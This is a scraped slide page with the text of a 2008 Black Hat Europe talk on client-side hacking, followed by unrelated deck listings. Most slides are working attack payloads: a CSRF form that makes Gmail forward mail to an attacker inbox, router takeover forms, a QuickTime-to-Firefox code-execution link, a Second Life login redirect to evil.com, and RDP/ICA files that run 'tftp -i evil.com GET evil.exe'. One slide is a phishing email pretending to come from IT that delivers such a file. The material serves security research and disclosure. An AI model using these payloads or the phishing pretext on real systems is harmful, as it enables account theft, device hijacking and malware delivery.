cutting edge think tank
play

Cutting-edge Think Tank BLACK HAT EUROPE 2008 CLIENT-SIDE SECURITY - PowerPoint PPT Presentation

Dec 23, 2023 •341 likes •948 views

Cutting-edge Think Tank BLACK HAT EUROPE 2008 CLIENT-SIDE SECURITY Overview of various Client-Side Hacking Tricks and Techniques pdp Information Security Researcher, founder of the GNUCITIZEN group OBJECTIVES I was planning to...

  2. Cutting-edge Think Tank

  3. BLACK HAT EUROPE 2008

  4. CLIENT-SIDE SECURITY Overview of various Client-Side Hacking Tricks and Techniques

  5. pdp Information Security Researcher, founder of the GNUCITIZEN group

  6. OBJECTIVES  I was planning to...  Research Design Issues  Innovate  Mix & Match Ideas

  7. CLIENTS & SERVERS  Symbiosis  Clients & Servers are in a constant interaction.  This interaction comes in various forms.  Their security model is shared.

  8. THE GMAIL HIJACK TECHNIQUE

  9. THE GMAIL HIJACK TECHNIQUE

  10. THE GMAIL HIJACK TECHNIQUE

  11. THE GMAIL HIJACK TECHNIQUE  Via a CSRF Redirection Utility  http://www.gnucitizen.org/util/csrf ?_method=POST&_enctype=multipart/form-data &_action=https%3A//mail.google.com/mail/h/ewt1jmuj4ddv/%3Fv%3Dprf &cf2_emc=true &cf2_email=evilinbox@mailinator.com &cf1_from &cf1_to &cf1_subj &cf1_has &cf1_hasnot &cf1_attach=true &tfi&s=z &irf=on&nvp_bu_cftb=Create%20Filter

  12. THE GMAIL HIJACK TECHNIQUE  HTML Code  <html> <body> <form name="form" method="POST" enctype="multipart/form-data" action="https://mail.google.com/mail/h/ewt1jmuj4ddv/?v=prf"> <input type="hidden" name="cf2_emc" value="true"/> <input type="hidden" name="cf2_email" value="evilinbox@mailinator.com"/> <input type="hidden" name="cf1_from" value=""/> <input type="hidden" name="cf1_to" value=""/> <input type="hidden" name="cf1_subj" value=""/> <input type="hidden" name="cf1_has" value=""/><input type="hidden" name="cf1_hasnot" value=""/> <input type="hidden" name="cf1_attach" value="true"/> <input type="hidden" name="tfi" value=""/> <input type="hidden" name="s" value="z"/> <input type="hidden" name="irf" value="on"/> <input type="hidden" name="nvp_bu_cftb" value="Create Filter"/> </form> <script>form.submit()</script> </body> </html>

  13. SOMEONE GOT HACKED It is unfortunate, but it gives us a good case study!

  14. PWNING BT HOME HUB  Enable Remote Assistance  <html> <!-- ras.html --> <head></head> <body> <form name='raccess' action='http://192.168.1.254/cgi/b/ras//? ce=1&be=1&l0=5&l1=5' method='post'> <input type='hidden' name='0' value='31'> <input type='hidden' name='1' value=''> <input type='hidden' name='30' value='12345678'> <!-- <input type='submit' value="own it!"> --> </form> <script>document.raccess.submit();</script> </body> </html>

  15. PWNING BT HOME HUB  Disable Wireless Connectivity  <html> <body> <!-- disable_wifi_interface.html --> <!-- POST /cgi/b/_wli_/cfg/?ce=1&be=1&l0=4&l1=0&name= HTTP/1.1 0=10&1=&32=&33=&34=2&35=1&45=11&47=1 --> <form action="http://192.168.1.254/cgi/b/_wli_/cfg//" method="post"> <input type="hidden" name="0" value="10"> <input type="hidden" name="1" value=""> <input type="hidden" name="32" value=""> <input type="hidden" name="33" value=""> <input type="hidden" name="34" value="2"> <input type="hidden" name="35" value="1"> <input type="hidden" name="45" value="11"> <input type="hidden" name="47" value="1"> </form> <script>document.forms[0].submit();</script> </body> </html>

  16. PWNING BT HOME HUB  Call Jacking  POST http://api.home/cgi/b/_voip_/stats//? ce=1&be=0&l0=-1&l1=-1&name= 0=30&1= 00390669893461  Is that the Vatican number?

  17. PWNED!!! Thanks to AP!!!

  18. PWNED!!! SNOM .mario hacked Snom

  19. CROSS-SITE FILE UPLOAD ATTACKS  The Flash Method  <mx:Application xmlns:mx="http://www.adobe.com/2006/mxml" creationComplete="onAppInit()"> <mx:Script> /* by Petko D. Petkov; pdp * GNUCITIZEN **/ import flash.net.*; private function onAppInit():void { var r:URLRequest = new URLRequest('http://victim.com/upload.php'); r.method = 'POST'; r.data = unescape('-----------------------------109092118919201%0D%0AContent-Disposition%3A form-data%3B name%3D%22file%22%3B filename%3D%22gc.txt%22%0D%0AContent-Type%3A text%2Fplain%0D%0A%0D%0AHi from GNUCITIZEN%21%0D %0A-----------------------------109092118919201%0D%0AContent-Disposition%3A form- data%3B name%3D%22submit%22%0D%0A%0D%0ASubmit Query%0D %0A-----------------------------109092118919201--%0A'); r.contentType = 'multipart/form-data; boundary=---------------------------109092118919201'; navigateToURL(r, '_self'); } </mx:Script> </mx:Application>

  20. CROSS-SITE FILE UPLOAD ATTACKS  The FORM Method  <form method="post" action="http://kuza55.awardspace.com/files.php" enctype="multipart/form-data"> <textarea name='file"; filename="filename.ext Content-Type: text/plain; '>Arbitrary File Contents</textarea> <input type="submit" value='Send "File"' /> </form>  by kuza55  Opera doesn't like it!

  21. QUICKTIME PWNS FIREFOX  QuickTime Media Links  <?xml version="1.0"> <?quicktime type="application/x-quicktime-media-link"?> <embed src="Sample.mov" autoplay="true"/>  Supported File Extensions 3g2, 3gp, 3gp2, 3gpp, AMR, aac, adts, aif, aifc, aiff, amc, au,  avi, bwf, caf, cdda, cel, flc, fli, gsm, m15, m1a, m1s, m1v, m2a, m4a, m4b, m4p, m4v, m75, mac, mov, mp2, mp3, mp4, mpa, mpeg, mpg, mpm, mpv, mqv, pct, pic, pict, png, pnt, pntg, qcp, qt, qti, qt

  22. QUICKTIME PWNS FIREFOX  The Exploit  <?xml version="1.0"> <?quicktime type="application/x-quicktime-media-link"?> <embed src="a.mp3" autoplay="true" qtnext=" -chrome javascript:file=Components.classes['@mozilla.org/file/local; 1'].createInstance(Components.interfaces.nsILocalFile);file.initWit hPath('c:\\windows\\system32\\calc.exe');process=Components.classes ['@mozilla.org/process/util; 1'].createInstance(Components.interfaces.nsIProcess);process.init(f ile);process.run(true,[],0);void(0); "/>

  23. QUICKTIME PWNS FIREFOX  The Exploit  qtnext=" -chrome javascript:...

  24. IE PWNS SECOND LIFE  The Exploit  <iframe src=' secondlife://" -autologin -loginuri "http://evil.com/sl/record- login.php' ></iframe>

  25. IE PWNS SECOND LIFE  Avatar Theft  [HTTP_RAW_POST_DATA] => <methodCall> <methodName>login_to_simulator</methodName> … … … <member> <name>passwd</name> <value> <string>$1$ [MD5 Hash of the password here] </string> </value> </member> … … … </methodCall>

  26. IE PWNS SECOND LIFE  …with that  <?php ob_start(); print_r($GLOBALS); error_log(ob_get_contents(), 0); ob_end_clean(); ?>

  27. ALL YOUR AVATARS ARE BELONG TO US!!!

  28. CITRIX/RDP COMMAND FIXATION ATTACKS  CITRIX ICA  [WFClient] Version=1 [ApplicationServers] Connection To Citrix Server= [Connection To Citrix Server] InitialProgram= some command here Address= 172.16.3.191 ScreenPercent=0  Microsoft RDP screen mode id:i:1  desktopwidth:i:800 desktopheight:i:600 session bpp:i:16 full address:s: 172.16.3.191 compression:i:1 keyboardhook:i:2 alternate shell:s: some command here shell working directory:s:C:\ bitmapcachepersistenable:i:1

  29. CITRIX/RDP COMMAND FIXATION ATTACKS  The Malicious One  screen mode id:i:1 desktopwidth:i:800 desktopheight:i:600 session bpp:i:16 full address:s: 172.16.3.191 compression:i:1 keyboardhook:i:2 alternate shell:s: cmd.exe /C “tftp -i evil.com GET evil.exe evil.exe & evil.exe” shell working directory:s:C:\ bitmapcachepersistenable:i:1

  30. Hello John, This is Tim from Tech Department. I was informed that you have some problems with your remote desktop connectivity. I’ve attached a modified RDP file you can tryout and see if it works. Just double click on the file and login. Your domain credentials should work. Let me know if you have any problems. Tim O’Brian Tech Department

  31. CITRIX/RDP COMMAND FIXATION ATTACKS  The Evil One  [WFClient] Version=1 [ApplicationServers] Connection To Citrix Server= [Connection To Citrix Server] AutoLogonAllowed=On UseLocalUserAndPassword=On InitialProgram=cmd.exe /C "tftp -i evil.com GET evil.exe evil.exe & evil.exe" ScreenPercent=0 CITRIX auto-start  In an iFrame  <iframe src="http://evil.com/path/to/evil.ica"></ iframe>

Recommend

RISK 2008 pdp information security researcher, hacker, founder of GNUCITIZEN Cutting-edge Think

RISK 2008 pdp information security researcher, hacker, founder of GNUCITIZEN Cutting-edge Think

RISK 2008 pdp information security researcher, hacker, founder of GNUCITIZEN Cutting-edge Think Tank ABOUT GNUCITIZEN Think tank Research Training Consultancy Ethical Hacker Outfit Responsible disclosure We have

1.04k views • 52 slides
Christchurch 20 th November 2012 Cutting Edge 2012 School of Addiction 2013 Cutting Edge 2013

Christchurch 20 th November 2012 Cutting Edge 2012 School of Addiction 2013 Cutting Edge 2013

Leadership Day Christchurch 20 th November 2012 Cutting Edge 2012 School of Addiction 2013 Cutting Edge 2013 Practitioner Registration Cutting Edge 2012 Relevant: 97.5% Enjoyable: 99% Recommend: 89% Cost reasonable 80%

255 views • 21 slides
B W ll L Be Well Lecture Series: t S i Cutting-edge Joint Replacement Cutting edge Joint

B W ll L Be Well Lecture Series: t S i Cutting-edge Joint Replacement Cutting edge Joint

B W ll L Be Well Lecture Series: t S i Cutting-edge Joint Replacement Cutting edge Joint Replacement Technologies and Advances in Functional Outcomes for Arthritis Patients Patients D David C. Ayers MD id C A MD Patricia Franklin MD,

713 views • 57 slides
DRAFT Florida Polytechnic University IT Vision Flexible, Nimble, Cutting Edge Campus

DRAFT Florida Polytechnic University IT Vision Flexible, Nimble, Cutting Edge Campus

The Digital Campus DRAFT Florida Polytechnic University IT Vision Flexible, Nimble, Cutting Edge Campus Todays Discussion How to create the Flexible, Nimble, Cutting Edge Campus for Today and Tomorrow! 1. Current Progress on Board

1.28k views • 57 slides
CONFIDENCE 2008 KRAKOW pdp information security researcher, hacker, founder of GNUCITIZEN

CONFIDENCE 2008 KRAKOW pdp information security researcher, hacker, founder of GNUCITIZEN

CONFIDENCE 2008 KRAKOW pdp information security researcher, hacker, founder of GNUCITIZEN Cutting-edge Think Tank ABOUT GNUCITIZEN Think tank Research Training Consultancy Ethical Hacker Outfit Responsible disclosure

929 views • 64 slides
Cutting Edge Options for Winter Operations 2013 www.ttspec.com The Good Old Days 1

Cutting Edge Options for Winter Operations 2013 www.ttspec.com The Good Old Days 1

10/21/2013 Cutting Edge Options for Winter Operations 2013 www.ttspec.com The Good Old Days 1 10/21/2013 1 st Truck I Ever Specd Out First One Butch Specd Out 2 10/21/2013 Pre-Underbody Scraper What sort of cutting edge is

355 views • 23 slides
Cutting edge Forum on Autonomous Driving, Contributions from Intelligent Robotics, AI and ITS

Cutting edge Forum on Autonomous Driving, Contributions from Intelligent Robotics, AI and ITS

Cutting edge Forum on Autonomous Driving, Contributions from Intelligent Robotics, AI and ITS AD19 2019 IEEE/RSJ International Conference on Intelligent Robots and Systems Cutting edge Forum on Autonomous Driving Contributions from Intelligent

191 views • 5 slides
20 th anniversary Serving drug discovery with cutting-edge software Dra Barna, PhD

20 th anniversary Serving drug discovery with cutting-edge software Dra Barna, PhD

20 th anniversary Serving drug discovery with cutting-edge software Dra Barna, PhD Application Scientist Live Chemistry in Microsoft Office Structure representation Chemical search R-group decomposition Import from files or databases

506 views • 13 slides
Cutting Edge Techniques in Hip Anesthesia: Blocks and Beyond! Sonia Szlyk, MD Director of

Cutting Edge Techniques in Hip Anesthesia: Blocks and Beyond! Sonia Szlyk, MD Director of

Cutting Edge Techniques in Hip Anesthesia: Blocks and Beyond! Sonia Szlyk, MD Director of Regional Anesthesia North American Partners in Anesthesia, Mid-Atlantic Division INOVA Fair Oaks Hospital, VA Disclosure National Speakers

518 views • 23 slides
Resources Using Cutting Edge Technology Sample prep &amp; handling Data correlation

Resources Using Cutting Edge Technology Sample prep &amp; handling Data correlation

Qualifying Frac Sand Resources Using Cutting Edge Technology Sample prep &amp; handling Data correlation PSD as decision tool PSD for fingerprinting Conclusions Camsizer Quick Reliable 21 st Century

764 views • 60 slides
MACHINE LEARNING MEETUP thinking outside the box horse chestnut good looking cutting edge

MACHINE LEARNING MEETUP thinking outside the box horse chestnut good looking cutting edge

MACHINE LEARNING MEETUP thinking outside the box horse chestnut good looking cutting edge More than one word (multiword) Meaning more than sum of the individual words Idioms More than meets the eye Phrasal Verbs Kick things off

707 views • 35 slides
Who We Cutting Edge Communications is a data collection services Are company for use in

Who We Cutting Edge Communications is a data collection services Are company for use in

5/4/2020 Providing Real Time, Mission Critical Data Helen Knox helen@cecsurveys.com (O) 713-827-0101 (C) 281-536-8696 1 Helen Knox Kevin Casebolt Brandon Lemley Who We Cutting Edge Communications is a data collection services Are

284 views • 6 slides
Empowering School Districts with Cutting Edge Soft Skills Ecosystems Can You Tell Us More About

Empowering School Districts with Cutting Edge Soft Skills Ecosystems Can You Tell Us More About

Empowering School Districts with Cutting Edge Soft Skills Ecosystems Can You Tell Us More About Simply Success? Ed Tech Company of the Year 2017 Industry Leading Soft Skills Training Provider Creator of SIPS Instructional Method

302 views • 15 slides
Win More Business &amp; Accelerate Profits : - InMarket Leads - Cutting Edge Data-Driven

Win More Business &amp; Accelerate Profits : - InMarket Leads - Cutting Edge Data-Driven

Win More Business &amp; Accelerate Profits : - InMarket Leads - Cutting Edge Data-Driven Marketing That Your Competitors Dont Even Know AboutYet. Right Now, there are hundreds of people searching for Franchise Consulting Services Can

650 views • 30 slides
F Freiburg_bioware ib bi Universal endonuclease cutting edge technology g g gy General

F Freiburg_bioware ib bi Universal endonuclease cutting edge technology g g gy General

F Freiburg_bioware ib bi Universal endonuclease cutting edge technology g g gy General Idea Programmable Restriction Endonuclease g Motivation: T Too many restriction enzymes t i ti Short recognition sites Too many cuts

435 views • 40 slides
MAKING THE MOST OF THE 2011-12 WINDOW OF OPPORTUNITY: TWO CUTTING EDGE TECHNIQUES PRESENTED TO:

MAKING THE MOST OF THE 2011-12 WINDOW OF OPPORTUNITY: TWO CUTTING EDGE TECHNIQUES PRESENTED TO:

MAKING THE MOST OF THE 2011-12 WINDOW OF OPPORTUNITY: TWO CUTTING EDGE TECHNIQUES PRESENTED TO: TIGER 21, GROUP DALLAS 02 September 9, 2011 Marvin E. Blum Steven W. Novak THE BLUM FIRM, P.C. 777 MAIN STREET, SUITE 700 FORT WORTH, TEXAS

200 views • 17 slides
EJTN AD On-line Classroom on EU Competition Law November 10, 2020 Cutting edge issues in

EJTN AD On-line Classroom on EU Competition Law November 10, 2020 Cutting edge issues in

EJTN AD On-line Classroom on EU Competition Law November 10, 2020 Cutting edge issues in competition law cases before the EU Courts Anthony M. Collins, EU General Court With financial support from the Justice Programme of the European Union

405 views • 16 slides
Artificial Intelligence at the Cutting Edge of Imaging and Oncology Drug Development Larry

Artificial Intelligence at the Cutting Edge of Imaging and Oncology Drug Development Larry

Artificial Intelligence at the Cutting Edge of Imaging and Oncology Drug Development Larry Schwartz Department of Radiology LSCHWARTZ@COLUMBIA.EDU Technology Breakthroughs MRI CT PET 1 out of 2 oncology visits includes a cross sectional

843 views • 38 slides
Supporting Cutting-Edge Synthetic Biology Research with Advanced Human Computer Interaction

Supporting Cutting-Edge Synthetic Biology Research with Advanced Human Computer Interaction

Supporting Cutting-Edge Synthetic Biology Research with Advanced Human Computer Interaction WELLESLEY HCI iGEM 2013 Casey Grote 14, Heather Petrow 14, Joanna Bi 15, Evan Segreto 15, Sravanti Tekumalla 16 Advised by Orit

560 views • 52 slides
INDUSTRIAL SOLUTIONS CUTTING EDGE ENGINEERING EN Pinto Brasil provides answers to specific

INDUSTRIAL SOLUTIONS CUTTING EDGE ENGINEERING EN Pinto Brasil provides answers to specific

INDUSTRIAL SOLUTIONS CUTTING EDGE ENGINEERING EN Pinto Brasil provides answers to specific requirements through customized solutions that focus on the ease of use and user safety with the objective of improving productivity and increase of

665 views • 14 slides
TopBrewer Projects A collection of installations Cutting edge designs THE FUTURE OF COFFEE

TopBrewer Projects A collection of installations Cutting edge designs THE FUTURE OF COFFEE

TopBrewer Projects A collection of installations Cutting edge designs THE FUTURE OF COFFEE New brewer. New design. New app. New technology. At Scanomat, we have reimagined the coffee experience to bring you a totally unique, state-of-

382 views • 23 slides
Cutting Edge Tools for Pricing and Underwriting Seminar Integrating External Data into the

Cutting Edge Tools for Pricing and Underwriting Seminar Integrating External Data into the

Version 10/1/11 Cutting Edge Tools for Pricing and Underwriting Seminar Integrating External Data into the Decision Making / Predictive Modeling Process Casualty Actuarial Society Ron Zaleski, Jr., FCAS, MAAA Fall 2011 1 Version 10/1/11

547 views • 29 slides
Business Management and Development Office Daniel Doetz cutting edge research

Business Management and Development Office Daniel Doetz cutting edge research

FACULTY OF HEALTH SCIENCES UNIVERSITY OF CAPE TOWN Business Management and Development Office Daniel Doetz cutting edge research world class training and education partnering for patient-centred health services

355 views • 17 slides
Conic Optimization: Relaxing at the Cutting Edge Miguel F . Anjos Professor and Canada Research

Conic Optimization: Relaxing at the Cutting Edge Miguel F . Anjos Professor and Canada Research

Background Integrated IPM New Relaxations Conclusion Conic Optimization: Relaxing at the Cutting Edge Miguel F . Anjos Professor and Canada Research Chair Various parts are joint work with E. Adams (Poly Mtl), A. Engau (U.

529 views • 38 slides

More recommend